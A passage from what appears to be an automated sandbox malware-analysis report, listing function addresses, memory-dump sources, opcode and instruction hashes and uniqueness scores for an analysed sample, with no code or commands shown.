                                                                      • Instruction Fuzzy Hash: BFE0E511B2E89B5EFE783829785907C506A8BC87D1F70073AE40FCAAC5EC0CE8422295
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CE86F Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8048cf57d3c672f75ea4bd90245e04047b79fe3a0cd708908e594d7812dd1e56
                                                                      • Instruction ID: 2fc3e4ec7974906e90f47f83eee54fd204086a9ff34d409691a7c040282f6bf9
                                                                      • Opcode Fuzzy Hash: 8048cf57d3c672f75ea4bd90245e04047b79fe3a0cd708908e594d7812dd1e56
                                                                      • Instruction Fuzzy Hash: B7F0B774E18A6D8EDBA4EE1888897A8B7B1FB59701F5040E9C05EE3241DE346D858F01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D5F98 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 19c49778e751d7984ca1f41a9523196c3f8fceed5cd2e73ac4ecfe2d5499890a
                                                                      • Instruction ID: 446ab0d91fe0f1fc3be8e2641ea82ecdb0978f52af4863241e4d146819d0c139
                                                                      • Opcode Fuzzy Hash: 19c49778e751d7984ca1f41a9523196c3f8fceed5cd2e73ac4ecfe2d5499890a
                                                                      • Instruction Fuzzy Hash: 23F0F870818A8D9FDB94EF6888496EE7BE5FF18345F5045AAE818C2150DB35A1A4CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F3186A Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f2b000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4bc9fdc6d03bb60e088e3e5b6b578a7cc5507ad1eb5083a4ce29168b2bce35d5
                                                                      • Instruction ID: dd48b8fcbbc15a74b81ee4d1f4b025f3c59e296c41542dd7c96187bb4d1a0df7
                                                                      • Opcode Fuzzy Hash: 4bc9fdc6d03bb60e088e3e5b6b578a7cc5507ad1eb5083a4ce29168b2bce35d5
                                                                      • Instruction Fuzzy Hash: 4DF06630D1D65ACFEBA0EB6488047AD76B0AF08385F20167AE40DD31C2DB3869919B08
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8496FF43D Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3532843938.00007FF8496F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8496F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8496f0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 503fc482ea672def696cc9aca4752474bf40cfa1ca968e8075cf1751d2dad981
                                                                      • Instruction ID: 51a44d058b520cddb5e5e8f0b2003f573233ef1d11e51df1427127dc87fd23a0
                                                                      • Opcode Fuzzy Hash: 503fc482ea672def696cc9aca4752474bf40cfa1ca968e8075cf1751d2dad981
                                                                      • Instruction Fuzzy Hash: C3F0583181CB8C8FDB66EF2888452A9BBA0FF51301F4405EAE418C6192DB38D958CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8496F8780 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3532843938.00007FF8496F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8496F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8496f0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 47ee0d27c7142f80c541f2142220827883163e6768ced4489d92a45fb1fafb82
                                                                      • Instruction ID: c636634037ebaff8c626a3b65f66ed7f1ee5e9996c67eea6f90b05d20baa21ee
                                                                      • Opcode Fuzzy Hash: 47ee0d27c7142f80c541f2142220827883163e6768ced4489d92a45fb1fafb82
                                                                      • Instruction Fuzzy Hash: 96F0347092428DCFCB04EF18C8825EE7BB0FF48348F10026AF84A93244DB30A660CBC1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F106C8 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f10000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 027439534d3988a2779e21e934ef481e473a9ebfc146fc41a1bf14f7133dc033
                                                                      • Instruction ID: ad7e14ba5661d963c02e5ff955dc2e5dae5377aa704ecdcb26936511996c3c5b
                                                                      • Opcode Fuzzy Hash: 027439534d3988a2779e21e934ef481e473a9ebfc146fc41a1bf14f7133dc033
                                                                      • Instruction Fuzzy Hash: 93F01C30818A4D9FEB84FF68D4496EABBE0FF58341F500466E80CD2190DB35A6A0CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CE8B6 Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c675346f652f0deabe126f517fe7bb52c44940d7daed05705e08d61ec19cc6e5
                                                                      • Instruction ID: 1bab1173b6ca30e3acc2d772c629f10631f286a833140c9a187f6ac55a2893e1
                                                                      • Opcode Fuzzy Hash: c675346f652f0deabe126f517fe7bb52c44940d7daed05705e08d61ec19cc6e5
                                                                      • Instruction Fuzzy Hash: 50F03F3090895D8FDFA9EF08C854BA9B7B1FB68340F1041DA800EE7290CA31AE84CF10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490C966F Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                                      • Instruction ID: 6bad1cd3f47a99fe06fed2f69eb9f74718e6f9dab1f417feebfff922a82045ba
                                                                      • Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                                      • Instruction Fuzzy Hash: A3F0B27490AA589FCF55EAA8C85AE99BBB0FF68300F1001DDD04ADB262CA219845DF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F151E3 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f10000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 010058fcc85bb7d2d33809c589bba23286a74847190640d82385f21c6658725b
                                                                      • Instruction ID: 872da6dcd5bfeef9d56e9c47410a7a0b943cb826ceb7ac3582c382ceec215fd2
                                                                      • Opcode Fuzzy Hash: 010058fcc85bb7d2d33809c589bba23286a74847190640d82385f21c6658725b
                                                                      • Instruction Fuzzy Hash: 53F0FE30E0591A8FE7A5EB28D8557E9B7B1EF84381F4041F9D00EE66D1DF342E458B44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8496F3490 Relevance: .0, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3532843938.00007FF8496F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8496F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8496f0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9873870c941a62b9688a3eeaaabbd8fe0eb70af227e10a5abe8e121e6eda041b
                                                                      • Instruction ID: 5df17ce507fd75b9cf8b8887e96114854a1a8c80873a7cfff6f6c5f49f6987ea
                                                                      • Opcode Fuzzy Hash: 9873870c941a62b9688a3eeaaabbd8fe0eb70af227e10a5abe8e121e6eda041b
                                                                      • Instruction Fuzzy Hash: 62E09A31808A8ECFDB64EF24D8412EAB7A1FF58385F00017AE40CC3184DB75A6A4CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D6D20 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cd86628e5157492e14b49e64eac6cc6f3ca0155395f3c2fb44103cc3c0a8f29d
                                                                      • Instruction ID: ada75f1b865960dedfcc81603c9fbd0ff8fc76a6415610615f1b42f12be385f5
                                                                      • Opcode Fuzzy Hash: cd86628e5157492e14b49e64eac6cc6f3ca0155395f3c2fb44103cc3c0a8f29d
                                                                      • Instruction Fuzzy Hash: 3DE04F3140964E8FDB54FF14D8056EA77A4FF54340F008635E82CC2180DB74A564C781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CF44C Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16b534273e53b1bf534127624209fb8fce0cb814d38da2b827deb56d5dc2562a
                                                                      • Instruction ID: 9565768fdb8dd7149f0a12864846148ce89adcd8f323d00f519b29c6bc448d14
                                                                      • Opcode Fuzzy Hash: 16b534273e53b1bf534127624209fb8fce0cb814d38da2b827deb56d5dc2562a
                                                                      • Instruction Fuzzy Hash: 72E0C93090C99D9FDFA9EF14C890EA8BBB0EF25340F2544D9C00AD7292CA30A985CF01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8496FF450 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3532843938.00007FF8496F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8496F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8496f0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bef147b0d7105f09f0fdf8e364b661c1e3c33587e49d2b68b190885976efdf86
                                                                      • Instruction ID: d0099003dfc1fff122d1499ccc348720da227ab63d9dd8b208da25dc4acb2d41
                                                                      • Opcode Fuzzy Hash: bef147b0d7105f09f0fdf8e364b661c1e3c33587e49d2b68b190885976efdf86
                                                                      • Instruction Fuzzy Hash: 0CE04630828A8DDFDB65FF6894046EAB7B0FF44305F4005AAF82CC2181DB34A2A4CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8496F09AD Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3532843938.00007FF8496F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8496F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8496f0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 688fa9dd4603af9258e32a955e6186b186718e0f1fc59ad31b6ee47e6654042a
                                                                      • Instruction ID: 0e9748b3c97a33765021965be07f9058d3227c93ffe654217558a18003b3f3e3
                                                                      • Opcode Fuzzy Hash: 688fa9dd4603af9258e32a955e6186b186718e0f1fc59ad31b6ee47e6654042a
                                                                      • Instruction Fuzzy Hash: 79E09230A0C54DCFEB10EF00C5505AD33B1EFA1380F104626C41A87299EA787A018B80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CA437 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a5596f2f47a330e0b132eb4d9a4655689ee2082b0a652f4774569d98b068b0d2
                                                                      • Instruction ID: 16cccb7cfb3fe9d9e76095ef22bd1b729133651c994a86b8de2438a4c377fef5
                                                                      • Opcode Fuzzy Hash: a5596f2f47a330e0b132eb4d9a4655689ee2082b0a652f4774569d98b068b0d2
                                                                      • Instruction Fuzzy Hash: F1D02B60D0C3C2DFEF3E6F7008A40382AA09F4B3C070401B6C01A4A1C3D918A8049732
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F3369E Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f2b000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 04e84273b1dbe282bc64f027037d80aa13fc5dbe55c526761b233c57fd02e70a
                                                                      • Instruction ID: fd5f92317a86622f6f13162cc36e43f5bafcad0db8d82df6b905d8166e9e1a57
                                                                      • Opcode Fuzzy Hash: 04e84273b1dbe282bc64f027037d80aa13fc5dbe55c526761b233c57fd02e70a
                                                                      • Instruction Fuzzy Hash: 2BD04274D0CA588EDB94EB18D8956A876B1FB58385F1001A9900EE72C1DB356A86CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D169B Relevance: .0, Instructions: 11COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8169d3cbdfe60771f470022db119687e615bfa2957ef6b9190a6c81f0fb13827
                                                                      • Instruction ID: 445bb0f5e196b8bbda15bf50f451e7476d74196faa6b7cb961075cdeac103fcc
                                                                      • Opcode Fuzzy Hash: 8169d3cbdfe60771f470022db119687e615bfa2957ef6b9190a6c81f0fb13827
                                                                      • Instruction Fuzzy Hash: 6AD0C910E0D6C38DFEBCBE014220E7D119D8F40B81E28033DD05F918C1CD2CF9026212
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D6E9B Relevance: .0, Instructions: 11COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05f092ddd65427193150ed79bbbec3dab1ce8f5eb3647e37a21fcb98ab4d372b
                                                                      • Instruction ID: fcc7fe64c5a100cf403d9738d8665ec8039e226451bd0b682de6932c89fa609d
                                                                      • Opcode Fuzzy Hash: 05f092ddd65427193150ed79bbbec3dab1ce8f5eb3647e37a21fcb98ab4d372b
                                                                      • Instruction Fuzzy Hash: C7D0C950A1C5C3CDFE397E05812073A699D5F84380E20473DC15F418C1CD2CF9016243
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CAF0B Relevance: .0, Instructions: 11COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b89d11629c83e1cba6763deeb5f07cf7ed64f1d5b7df713866ee4de2b032f81c
                                                                      • Instruction ID: d0eb2412c03987e876b80547b99f3877e426d392e0b6fba7c69f3d63e3612149
                                                                      • Opcode Fuzzy Hash: b89d11629c83e1cba6763deeb5f07cf7ed64f1d5b7df713866ee4de2b032f81c
                                                                      • Instruction Fuzzy Hash: F3D0CAA4A0D5C78DFE3D7E81822033E21E9AF41381FA0003ED59F42EC1CD2CF802A202
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%